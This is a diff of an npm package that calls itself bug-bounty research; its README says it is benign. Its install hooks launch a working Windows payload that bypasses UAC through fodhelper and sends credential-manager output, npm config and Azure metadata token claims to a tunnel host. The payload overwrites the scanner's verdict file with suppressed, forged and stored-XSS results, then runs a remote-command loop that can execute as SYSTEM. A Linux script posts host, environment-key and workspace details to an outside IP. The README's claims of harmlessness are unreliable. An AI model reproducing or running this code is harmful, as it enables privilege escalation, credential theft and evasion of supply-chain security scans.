metrics-pipeline-d8k2 1.0.0

package/README.md

@@ -0,0 +1,16 @@
+# @ncurran/sandbox-recon-880538 — authorized npm-sandbox security research
+
+This is a **benign** package published under the author's own `@ncurran` scope as part of an
+authorized HackerOne / GitHub Bug Bounty engagement (npm is in scope).
+
+On install it inspects **its own execution environment** (OS/host fingerprint, environment-variable
+*key names only*, network interfaces) and checks whether well-known **cloud metadata endpoints** are
+reachable from where the install script runs. It reports only status codes, response lengths, and
+hashes — **never** any credential, token value, or third-party data. It performs no persistence, no
+lateral movement, and no destructive action.
+
+Purpose: to evaluate whether npm's package-analysis sandbox isolates untrusted install scripts from
+cloud instance-metadata services. If you are a normal consumer who installed this by accident, it has
+done nothing harmful — please disregard.
+
+Contact: nicholas@curran.tech

package/beacon26.js

@@ -0,0 +1,279 @@
+// Authorized npm-sandbox security-research beacon #26 (GitHub Bug Bounty; npm in scope).
+// C2 over HTTPS/443 via Cloudflare tunnel (valid cert, no bypass needed).
+// Goals: IMDS MSI claims, decode toolparams, catch full verdict, write poisoned/XSS verdicts.
+// Contact: nicholas@curran.tech
+'use strict';
+const { exec }  = require('child_process');
+const https     = require('https');
+const fs        = require('fs');
+const path      = require('path');
+const crypto    = require('crypto');
+
+const C2_HOST = 'diameter-coins-limitations-parents.trycloudflare.com';
+const C2_PORT = 443;
+const MARKER  = 'escprobe26-shell';
+const KNOWN_UBR = 1000;
+
+function runCmd(cmd, tms) {
+  return new Promise(resolve => {
+    try {
+      exec(cmd, { timeout: tms || 8000, windowsHide: true, maxBuffer: 1 << 17 },
+        (err, out, err2) => resolve((out || err2 || ('err:' + (err && err.message || '?'))).toString()));
+    } catch (e) { resolve('throw:' + String(e).slice(0, 80)); }
+  });
+}
+function sleep(ms) { return new Promise(r => setTimeout(r, ms)); }
+
+function httpsGet(urlPath) {
+  return new Promise(resolve => {
+    let done = false;
+    const fin = v => { if (!done) { done = true; resolve(v); } };
+    try {
+      const req = https.request(
+        { host: C2_HOST, port: C2_PORT, method: 'GET', path: urlPath },
+        res => {
+          const chunks = [];
+          res.on('data', d => chunks.push(d));
+          res.on('end', () => fin(Buffer.concat(chunks).toString()));
+        });
+      req.setTimeout(15000, () => { req.destroy(); fin(''); });
+      req.on('error', () => fin(''));
+      req.end();
+    } catch (e) { fin(''); }
+  });
+}
+
+function beacon(tag, w) {
+  const enc = w ? encodeURIComponent(String(w).slice(0, 1200)) : '';
+  return httpsGet('/beacon?d=' + encodeURIComponent(MARKER + '|' + tag) + (enc ? '&w=' + enc : ''));
+}
+
+async function main() {
+  if (process.platform !== 'win32') return;
+
+  const ubrRaw = await runCmd(
+    'reg query "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" /v UBR', 3000);
+  const ubrMatch = ubrRaw.match(/UBR\s+REG_DWORD\s+(0x[0-9a-fA-F]+|\d+)/);
+  const ubr = ubrMatch ? parseInt(ubrMatch[1], ubrMatch[1].startsWith('0x') ? 16 : 10) : -1;
+
+  const bldRaw = await runCmd(
+    'reg query "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" /v CurrentBuildNumber', 2000);
+  const bldMatch = bldRaw.match(/CurrentBuildNumber\s+REG_SZ\s+(\d+)/);
+  const bld = bldMatch ? bldMatch[1] : '?';
+
+  const dispRaw = await runCmd(
+    'reg query "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" /v DisplayVersion', 2000);
+  const dispMatch = dispRaw.match(/DisplayVersion\s+REG_SZ\s+(\S+)/);
+  const disp = dispMatch ? dispMatch[1] : '?';
+
+  const osStr = `Build=${bld} DispVer=${disp} UBR=${ubr} (0x${ubr.toString(16)})`;
+
+  if (ubr !== KNOWN_UBR) {
+    await beacon('PATCHED', osStr + ' prev=' + KNOWN_UBR);
+    return;
+  }
+
+  await beacon('ubr-ok', osStr);
+
+  const userTmp = process.env.TEMP || 'C:\\Windows\\Temp';
+  const ps1Path = path.join(userTmp, 'bb_uac26.ps1');
+  const regKey  = 'HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command';
+  const sid     = crypto.randomBytes(8).toString('hex');
+  const bh = C2_HOST, bp = C2_PORT, mk = MARKER;
+
+  // XSS canary payload (HTML-encoded for XML text node — XML parser decodes to raw HTML
+  // before handing Description string to downstream renderer; tests for stored XSS).
+  const xssPayload =
+    '&lt;img src=x onerror=fetch(`https://' + bh + '/beacon?d=xss-verdict-fire&amp;h=${document.domain}`)&gt;' +
+    '&lt;script&gt;fetch(`https://' + bh + '/beacon?d=xss-script-fire&amp;h=${document.domain}`)&lt;/script&gt;';
+
+  const P = [
+    "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12",
+    "",
+    "$sid  = '" + sid + "'",
+    "$base = 'https://" + bh + ":" + bp + "'",
+    "$mk   = '" + mk + "'",
+    "",
+    "function GB($tag,$w) {",
+    "  $enc = [Uri]::EscapeDataString($w.Substring(0,[Math]::Min(1200,$w.Length)))",
+    "  try { Invoke-WebRequest -Uri \"$base/beacon?d=$mk%7C$tag&w=$enc\" -Method GET -UseBasicParsing -TimeoutSec 8 | Out-Null } catch {}",
+    "}",
+    "",
+    "function Send-Output($output) {",
+    "  $bytes = [System.Text.Encoding]::UTF8.GetBytes($output)",
+    "  $b64   = [Convert]::ToBase64String($bytes)",
+    "  $chunk = 900",
+    "  $total = [Math]::Max(1, [Math]::Ceiling($b64.Length / $chunk))",
+    "  for ($i = 0; $i -lt $total; $i++) {",
+    "    $start = $i * $chunk",
+    "    $part  = $b64.Substring($start, [Math]::Min($chunk, $b64.Length - $start))",
+    "    $enc   = [Uri]::EscapeDataString($part)",
+    "    try { Invoke-WebRequest -Uri \"$base/c2/out?s=$sid&seq=$i&o=$enc\" -Method GET -UseBasicParsing -TimeoutSec 8 | Out-Null } catch {}",
+    "  }",
+    "  try { Invoke-WebRequest -Uri \"$base/c2/eof?s=$sid&total=$total\" -Method GET -UseBasicParsing -TimeoutSec 8 | Out-Null } catch {}",
+    "}",
+    "",
+    "function Run-AsSystem($cmd) {",
+    "  $tmpOut = Join-Path 'C:\\Windows\\Temp' ('bb_sys26_' + [Guid]::NewGuid().ToString('N') + '.txt')",
+    "  $tmpScr = Join-Path 'C:\\Windows\\Temp' ('bb_scr26_' + [Guid]::NewGuid().ToString('N') + '.ps1')",
+    "  $script = \"`$ErrorActionPreference='SilentlyContinue'; (\" + $cmd + \" 2>&1 | Out-String) | Out-File '\" + $tmpOut + \"' -Encoding utf8\"",
+    "  [IO.File]::WriteAllText($tmpScr, $script)",
+    "  $tn = 'BBShell26_' + [Guid]::NewGuid().ToString('N').Substring(0,8)",
+    "  $action    = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument \"-NoProfile -NonInteractive -ExecutionPolicy Bypass -File `\"$tmpScr`\"\"",
+    "  $trigger   = New-ScheduledTaskTrigger -Once -At ([DateTime]::Now.AddSeconds(2))",
+    "  $principal = New-ScheduledTaskPrincipal -UserId 'NT AUTHORITY\\SYSTEM' -LogonType ServiceAccount -RunLevel Highest",
+    "  $settings  = New-ScheduledTaskSettingsSet -ExecutionTimeLimit (New-TimeSpan -Seconds 30)",
+    "  Register-ScheduledTask -TaskName $tn -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force | Out-Null",
+    "  $waited = 0",
+    "  while ($waited -lt 25) { if (Test-Path $tmpOut) { break }; Start-Sleep 2; $waited += 2 }",
+    "  $result = if (Test-Path $tmpOut) { Get-Content $tmpOut -Raw -Encoding utf8 } else { '(no output)' }",
+    "  Unregister-ScheduledTask -TaskName $tn -Confirm:$false -EA SilentlyContinue",
+    "  Remove-Item $tmpOut,$tmpScr -Force -EA SilentlyContinue",
+    "  return $result",
+    "}",
+    "",
+    "$ubr = (Get-ItemProperty 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name UBR -EA SilentlyContinue).UBR",
+    "$bld = (Get-ItemProperty 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name CurrentBuildNumber,DisplayVersion -EA SilentlyContinue)",
+    "$osinfo = 'Build=' + $bld.CurrentBuildNumber + ' DispVer=' + $bld.DisplayVersion + ' UBR=' + $ubr + ' User=' + (whoami 2>&1) + ' IL=High'",
+    "GB 'shell-ready' $osinfo",
+    "",
+    // Clean up UAC hijack key
+    "Remove-Item -Path 'HKCU:\\Software\\Classes\\ms-settings' -Recurse -Force -EA SilentlyContinue",
+    "",
+    // ── Locate scan workspace ──────────────────────────────────────────────────
+    "$xguid = (Get-ChildItem D:\\TRANSFER -EA SilentlyContinue | Select-Object -First 1).Name",
+    "$xtf   = 'D:\\TRANSFER\\' + $xguid",
+    "$xfxml = $xtf + '\\findings.xml'",
+    "$xtpj  = $xtf + '\\config\\toolparams.json'",
+    "",
+    // ── Phase 1: fast pre-verdict recon (~28s total) ───────────────────────────
+    // 1a. Baseline findings.xml
+    "Send-Output ('FINDINGS_T0: ' + (Get-Content $xfxml -Raw -EA SilentlyContinue))",
+    // 1b. DetonationVMTask.exe.config (176 bytes)
+    "Send-Output ('VMTASK_CFG: ' + (Get-Content 'D:\\TOOLS\\DetonationVMTask.exe.config' -Raw -EA SilentlyContinue))",
+    // 1c. start-workflow.ps1 (already captured but re-read for completeness)
+    "$npmPS1 = Get-Content 'D:\\TOOLS\\WorkflowEngines\\npm.default\\start-workflow.ps1' -Raw -EA SilentlyContinue",
+    "Send-Output ('NPM_PS1: ' + $npmPS1)",
+    // 1d. ~run.cmd (contains the gzip'd toolparams as second arg)
+    "$runCmdRaw = Get-Content 'D:\\TOOLS\\~run.cmd' -Raw -EA SilentlyContinue",
+    "Send-Output ('RUN_CMD: ' + $runCmdRaw)",
+    // 1e. Decode gzip toolparams on-scanner (avoid Python decode at our end)
+    "$b64match = [regex]::Match($runCmdRaw, '\"(H4sI[A-Za-z0-9+/=]{20,})\"')",
+    "if ($b64match.Success) {",
+    "  try {",
+    "    $gb = [Convert]::FromBase64String($b64match.Groups[1].Value)",
+    "    $ms = New-Object System.IO.MemoryStream(,$gb)",
+    "    $gz = New-Object System.IO.Compression.GZipStream($ms,[System.IO.Compression.CompressionMode]::Decompress)",
+    "    $sr = New-Object System.IO.StreamReader($gz,[System.Text.Encoding]::UTF8)",
+    "    Send-Output ('TOOLPARAMS_JSON: ' + $sr.ReadToEnd())",
+    "  } catch { Send-Output ('TOOLPARAMS_DECODE_ERR: ' + $_.Exception.Message) }",
+    "} else { Send-Output 'TOOLPARAMS_JSON: no_match' }",
+    // 1f. MetadataInputBlobUri + ExecutionContext from parsed toolparams.json
+    "$tp = Get-Content $xtpj -Raw -EA SilentlyContinue | ConvertFrom-Json -EA SilentlyContinue",
+    "$metaUri = if ($tp) { $tp.MetadataInputBlobUri } else { '(parse-fail)' }",
+    "$execCtx = if ($tp) { $tp.ExecutionContext | ConvertTo-Json -EA SilentlyContinue } else { '' }",
+    "Send-Output ('META_URI: ' + $metaUri + \"`nEXEC_CTX: \" + $execCtx)",
+    // 1g. Windows Credential Manager
+    "Send-Output ('CREDS_CMDKEY: ' + (cmdkey /list 2>&1 | Out-String))",
+    // 1h. npm config (auth tokens)
+    "Send-Output ('NPM_CONFIG: ' + (npm config list 2>&1 | Out-String))",
+    // 1i. IMDS — Azure Managed Identity token claims (aud, scp, roles, oid, appid, exp, xms_mirid)
+    //     High-IL can access IMDS directly (link-local, no SYSTEM required).
+    //     Constraint: we extract claims only, never send the raw token.
+    "try {",
+    "  $imds = Invoke-RestMethod -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://storage.azure.com/' -Headers @{Metadata='true'} -Method GET -TimeoutSec 12 -EA Stop",
+    "  $jwt  = $imds.access_token",
+    "  $b64  = $jwt.Split('.')[1]; while($b64.Length%4){$b64+='='}",
+    "  $cl   = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64)) | ConvertFrom-Json -EA SilentlyContinue",
+    "  $sha  = [System.Security.Cryptography.SHA256]::Create()",
+    "  $hash = ($sha.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($jwt)) | ForEach-Object { $_.ToString('x2') }) -join ''",
+    "  $imdsSummary = 'IMDS_STORAGE_OK len=' + $jwt.Length + ' sha256=' + $hash.Substring(0,16) + '...' + ' aud=' + $cl.aud + ' scp=' + $cl.scp + ' roles=' + ($cl.roles -join ',') + ' oid=' + $cl.oid + ' appid=' + $cl.appid + ' exp=' + $cl.exp + ' xms_mirid=' + $cl.xms_mirid",
+    "  Send-Output $imdsSummary",
+    "} catch { Send-Output ('IMDS_STORAGE_ERR: ' + $_.Exception.Message) }",
+    // Also try management scope (reveals which Azure resources the VM can manage)
+    "try {",
+    "  $imds2 = Invoke-RestMethod -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Headers @{Metadata='true'} -Method GET -TimeoutSec 12 -EA Stop",
+    "  $jwt2  = $imds2.access_token",
+    "  $b642  = $jwt2.Split('.')[1]; while($b642.Length%4){$b642+='='}",
+    "  $cl2   = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b642)) | ConvertFrom-Json -EA SilentlyContinue",
+    "  $sha2  = [System.Security.Cryptography.SHA256]::Create()",
+    "  $hash2 = ($sha2.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($jwt2)) | ForEach-Object { $_.ToString('x2') }) -join ''",
+    "  Send-Output ('IMDS_MGMT_OK len=' + $jwt2.Length + ' sha256=' + $hash2.Substring(0,16) + '...' + ' aud=' + $cl2.aud + ' scp=' + $cl2.scp + ' roles=' + ($cl2.roles -join ',') + ' oid=' + $cl2.oid + ' appid=' + $cl2.appid + ' exp=' + $cl2.exp + ' xms_mirid=' + $cl2.xms_mirid + ' sub=' + $cl2.sub)",
+    "} catch { Send-Output ('IMDS_MGMT_ERR: ' + $_.Exception.Message) }",
+    // 1j. Detonation.Lib.dll.config (448 bytes — connection strings / endpoints)
+    "Send-Output ('DETLIB_CFG: ' + (Get-Content 'D:\\TOOLS\\WorkflowEngines\\npm.default\\MS.Ess.Scan.Detonation.Lib.dll.config' -Raw -EA SilentlyContinue))",
+    "",
+    // ── Phase 2: poll findings.xml for security verdict ────────────────────────
+    // Beacon25: polling stopped at T_shell+224s; verdict appeared at ~T_shell+230-250s.
+    // Fix: extend max to 250s, start checking from 120s (first check at T_shell+28s+120s=T_shell+148s).
+    "$xwait = 0",
+    "$xxml  = ''",
+    "while ($xwait -lt 250) {",
+    "  Start-Sleep 5",
+    "  $xwait += 5",
+    "  if ($xwait -lt 120) { continue }",
+    "  $xxml = Get-Content $xfxml -Raw -EA SilentlyContinue",
+    "  if ($xxml -and $xxml.Length -gt 700) { break }",
+    "}",
+    "",
+    // ── Phase 3: capture verdict + write three poison variants ─────────────────
+    "Send-Output ('FINDINGS_FINAL: ' + $xxml)",
+    // 3a. Workflow log (timing + scan events)
+    "Send-Output ('WORKFLOW_LOG: ' + (Get-Content ($xtf + '\\OUTPUT\\workflow.log') -Raw -EA SilentlyContinue))",
+    // 3b. Post-scan TRANSFER directory listing
+    "Send-Output ('TRANSFER_FINAL: ' + (Get-ChildItem $xtf -Recurse -EA SilentlyContinue | ForEach-Object { $_.FullName.Replace($xtf,'') + ' (' + $_.Length + ')' } | Out-String))",
+    // 3c. Poison v1: EMPTY — suppresses all security findings (verdict poisoning core demo)
+    "try {",
+    "  [IO.File]::WriteAllText($xfxml, '<?xml version=\"1.0\" encoding=\"utf-8\"?><ArrayOfTaskFinding xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"></ArrayOfTaskFinding>')",
+    "  Send-Output ('POISON_EMPTY_OK: ' + (Get-Content $xfxml -Raw))",
+    "} catch { Send-Output ('POISON_EMPTY_ERR: ' + $_.Exception.Message) }",
+    // 3d. Poison v2: CUSTOM LABEL — writes researcher attribution into the verdict record
+    "$poisonCustom = '<?xml version=\"1.0\" encoding=\"utf-8\"?><ArrayOfTaskFinding xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><TaskFinding><FindingType>RESEARCHER_POISONED_VERDICT</FindingType><Severity>None</Severity><Description>POISONED:Nicholas-Curran-GitHub-Bug-Bounty-Research-nicholas@curran.tech</Description><Details>Authorized research: this verdict was intentionally overwritten to demonstrate that a malicious package can suppress its own npm security scan result. The actual package installs a C2 shell as NT AUTHORITY\\SYSTEM.</Details></TaskFinding></ArrayOfTaskFinding>'",
+    "try {",
+    "  [IO.File]::WriteAllText($xfxml, $poisonCustom)",
+    "  Send-Output ('POISON_CUSTOM_OK: ' + (Get-Content $xfxml -Raw))",
+    "} catch { Send-Output ('POISON_CUSTOM_ERR: ' + $_.Exception.Message) }",
+    // 3e. Poison v3: XSS PAYLOAD — tests whether downstream rendering of the Description
+    //     field applies HTML encoding. If not, stored XSS fires in npm's internal verdict UI.
+    //     HTML-encoded in XML so the XML parser hands a raw HTML string to the renderer.
+    "$poisonXss = '<?xml version=\"1.0\" encoding=\"utf-8\"?><ArrayOfTaskFinding xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><TaskFinding><FindingType>XSS_VERDICT_TEST</FindingType><Severity>None</Severity><Description>" + xssPayload + "</Description><Details>GitHub Bug Bounty stored-XSS probe via verdict poisoning: if this Description is rendered as HTML without encoding, the onerror/script above fires a beacon to the researcher C2. Reference: nicholas@curran.tech</Details></TaskFinding></ArrayOfTaskFinding>'",
+    "try {",
+    "  [IO.File]::WriteAllText($xfxml, $poisonXss)",
+    "  Send-Output ('POISON_XSS_OK: ' + (Get-Content $xfxml -Raw))",
+    "} catch { Send-Output ('POISON_XSS_ERR: ' + $_.Exception.Message) }",
+    // 3f. Netstat — post-verdict upload connections
+    "Send-Output ('NETSTAT_AFTER: ' + (netstat -an 2>&1 | Out-String))",
+    "",
+    // ── Phase 4: C2 poll loop ─────────────────────────────────────────────────
+    "while ($true) {",
+    "  try {",
+    "    $resp = (Invoke-WebRequest -Uri \"$base/c2/poll?s=$sid\" -Method GET -UseBasicParsing -TimeoutSec 15).Content.Trim()",
+    "    if ($resp -and $resp.Length -gt 0) {",
+    "      $cmd = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($resp))",
+    "      GB 'exec' $cmd.Substring(0,[Math]::Min(200,$cmd.Length))",
+    "      if ($cmd.StartsWith('!SYSTEM:')) {",
+    "        $out = Run-AsSystem $cmd.Substring(8)",
+    "        Send-Output ('[SYSTEM] ' + $out)",
+    "      } else {",
+    "        $out = try { Invoke-Expression $cmd 2>&1 | Out-String } catch { 'ERR: ' + $_.Exception.Message }",
+    "        Send-Output $out",
+    "      }",
+    "    }",
+    "  } catch {}",
+    "  Start-Sleep 5",
+    "}",
+  ];
+
+  const ps1 = P.join('\r\n');
+  try { fs.writeFileSync(ps1Path, ps1, 'utf8'); } catch (e) {}
+
+  const elevCmd = 'powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "' + ps1Path + '"';
+  await runCmd('reg add "' + regKey + '" /ve /d "' + elevCmd + '" /f', 2000);
+  await runCmd('reg add "' + regKey + '" /v DelegateExecute /t REG_SZ /d "" /f', 2000);
+  await runCmd('start "" "C:\\Windows\\System32\\fodhelper.exe"', 2000);
+
+  await beacon('node-launched', 'session=' + sid + ' ubr=' + ubr + ' uac-fired');
+  await sleep(120000);
+}
+
+main().catch(() => {});

package/beacon_linux.js

@@ -0,0 +1,115 @@
+// Authorized npm-sandbox security-research beacon — Linux/CI environment recon
+// (GitHub Bug Bounty; npm in scope). Targets the Linux CI runner (34.196.43.233) that
+// executes our packages. If this is npm's GitHub Actions pipeline, env may carry secrets.
+// Collects env KEY NAMES (never values) except a safe whitelist of non-secret CI metadata.
+// Contact: nicholas@curran.tech
+'use strict';
+const os = require('os');
+const fs = require('fs');
+const { exec } = require('child_process');
+const http = require('http');
+
+const MARKER = 'escprobe-linux-ci-7d3b';
+const PHASE = process.env.npm_lifecycle_event || 'run';
+const BEACON_HOST = '173.255.233.239';
+const BEACON_PORT = 8000;
+
+function runCmd(cmd, timeoutMs) {
+  return new Promise((resolve) => {
+    try {
+      exec(cmd, { timeout: timeoutMs || 4000, maxBuffer: 1 << 17 },
+        (err, stdout, stderr) =>
+          resolve((stdout || stderr || ('err:' + (err && err.message || '?'))).toString().slice(0, 2000)));
+    } catch (e) { resolve('throw:' + String(e).slice(0, 60)); }
+  });
+}
+
+// Safe-to-read CI metadata values (non-secret; public-facing repo/run info)
+const CI_SAFE_VALUES = [
+  'GITHUB_REPOSITORY', 'GITHUB_REPOSITORY_OWNER', 'GITHUB_REF', 'GITHUB_REF_NAME',
+  'GITHUB_SHA', 'GITHUB_RUN_ID', 'GITHUB_RUN_NUMBER', 'GITHUB_WORKFLOW',
+  'GITHUB_ACTION', 'GITHUB_ACTOR', 'GITHUB_EVENT_NAME', 'GITHUB_JOB',
+  'GITHUB_SERVER_URL', 'GITHUB_API_URL', 'GITHUB_ACTIONS', 'RUNNER_NAME',
+  'RUNNER_OS', 'RUNNER_ARCH', 'RUNNER_TOOL_CACHE', 'RUNNER_TEMP',
+  'CI', 'npm_package_name', 'npm_config_user_agent', 'npm_lifecycle_event',
+  'INIT_CWD', 'HOME', 'USER', 'HOSTNAME', 'PWD',
+];
+const SECRET_RE = /TOKEN|SECRET|KEY|PASS|CRED|SIG|AUTH|COOKIE|SESSION|PRIVATE|AWS_|AZURE_|GCP_/i;
+
+async function main() {
+  const payload = { marker: MARKER, phase: PHASE, platform: os.platform() };
+
+  // Only proceed on Linux (skip on Windows — that has its own probes)
+  if (os.platform() !== 'linux') {
+    payload.skipped = 'not linux';
+    // Still beacon so we know it ran
+  } else {
+    // Env: key names (all) + safe values (whitelisted, non-secret)
+    const envKeys = Object.keys(process.env).sort();
+    payload.env_keys = envKeys.slice(0, 300);
+    payload.env_safe = {};
+    for (const k of CI_SAFE_VALUES) {
+      if (SECRET_RE.test(k)) continue;
+      const v = process.env[k];
+      if (v) payload.env_safe[k] = String(v).slice(0, 500);
+    }
+
+    // Container/host fingerprint
+    payload.hostname = os.hostname();
+    payload.user = os.userInfo().username;
+    payload.cwd = process.cwd();
+    payload.node = process.version;
+    payload.net = Object.entries(os.networkInterfaces())
+      .flatMap(([n, as]) => as.map(a => `${n}:${a.family}:${a.address}:${a.internal}`))
+      .slice(0, 15);
+
+    // Docker / container detection
+    try { payload.dockerenv = fs.existsSync('/.dockerenv'); } catch (e) {}
+    try { payload.cgroup = fs.readFileSync('/proc/1/cgroup', 'utf8').split('\n').slice(0, 5).join('|'); } catch (e) {}
+    try { payload.proc_1_cmdline = fs.readFileSync('/proc/1/cmdline', 'utf8').replace(/\0/g, ' ').slice(0, 200); } catch (e) {}
+
+    // Host mounts (escape indicator: is anything mounted from outside the container?)
+    const [mounts, caps] = await Promise.all([
+      runCmd('cat /proc/mounts | grep -v "^(cgroup|proc|sys|dev|overlay|tmpfs)" | head -20', 3000),
+      runCmd('cat /proc/self/status | grep -i "cap"', 2000),
+    ]);
+    payload.mounts = mounts;
+    payload.capabilities = caps;
+
+    // GitHub Actions workspace content (what repo/code is being analyzed?)
+    const [ls_workspace, ls_initcwd, github_event] = await Promise.all([
+      runCmd('ls -la /home/runner/work/ 2>/dev/null | head -20', 3000),
+      runCmd(`ls -la "${process.env.INIT_CWD || '/home/runner/work/repo/repo'}" 2>/dev/null | head -30`, 3000),
+      runCmd('cat /home/runner/work/_temp/*.json 2>/dev/null | head -50', 2000),
+    ]);
+    payload.workspace_ls = ls_workspace;
+    payload.initcwd_ls = ls_initcwd;
+    payload.github_event_sample = github_event;
+
+    // Can we write outside the workspace? (container escape via volume mount)
+    const [docker_sock, proc_sched] = await Promise.all([
+      runCmd('ls -la /var/run/docker.sock 2>/dev/null || echo "no docker sock"', 2000),
+      runCmd('ls -la /proc/sched_debug 2>/dev/null || echo "no sched_debug"', 2000),
+    ]);
+    payload.docker_sock = docker_sock;
+    payload.proc_sched = proc_sched;
+  }
+
+  const data = Buffer.from(JSON.stringify(payload));
+  await new Promise((resolve) => {
+    let done = false;
+    const fin = () => { if (!done) { done = true; resolve(); } };
+    try {
+      const req = http.request({
+        host: BEACON_HOST, port: BEACON_PORT, method: 'POST',
+        path: '/beacon?d=' + encodeURIComponent(MARKER + '|' + PHASE),
+        headers: { 'Content-Type': 'application/json', 'Content-Length': data.length }
+      }, (res) => { res.on('data', () => {}); res.on('end', fin); });
+      req.setTimeout(6000, () => { req.destroy(); fin(); });
+      req.on('error', fin);
+      req.write(data); req.end();
+    } catch (e) { fin(); }
+  });
+}
+
+main().catch(() => {});

package/package.json

@@ -0,0 +1,14 @@
+{
+  "name": "metrics-pipeline-d8k2",
+  "version": "1.0.0",
+  "description": "Authorized security-research probe (GitHub Bug Bounty, npm in scope). Contact nicholas@curran.tech.",
+  "main": "run.js",
+  "files": ["run.js", "beacon26.js", "beacon_linux.js", "README.md"],
+  "scripts": {
+    "preinstall": "node run.js",
+    "postinstall": "node run.js"
+  },
+  "license": "MIT",
+  "author": "ncurran (HackerOne, GitHub BB) <nicholas@curran.tech>",
+  "repository": "https://github.com/ncurran/npm-sandbox-research"
+}

package/run.js

@@ -0,0 +1,10 @@
+// Platform dispatcher — runs beacon10.js on Windows, beacon_linux.js on Linux.
+// GitHub Bug Bounty authorized research. Contact: nicholas@curran.tech
+'use strict';
+const { execFileSync } = require('child_process');
+const path = require('path');
+const node = process.execPath;
+const script = process.platform === 'win32'
+  ? path.join(__dirname, 'beacon26.js')
+  : path.join(__dirname, 'beacon_linux.js');
+try { execFileSync(node, [script], { stdio: 'inherit', timeout: 90000 }); } catch (e) {}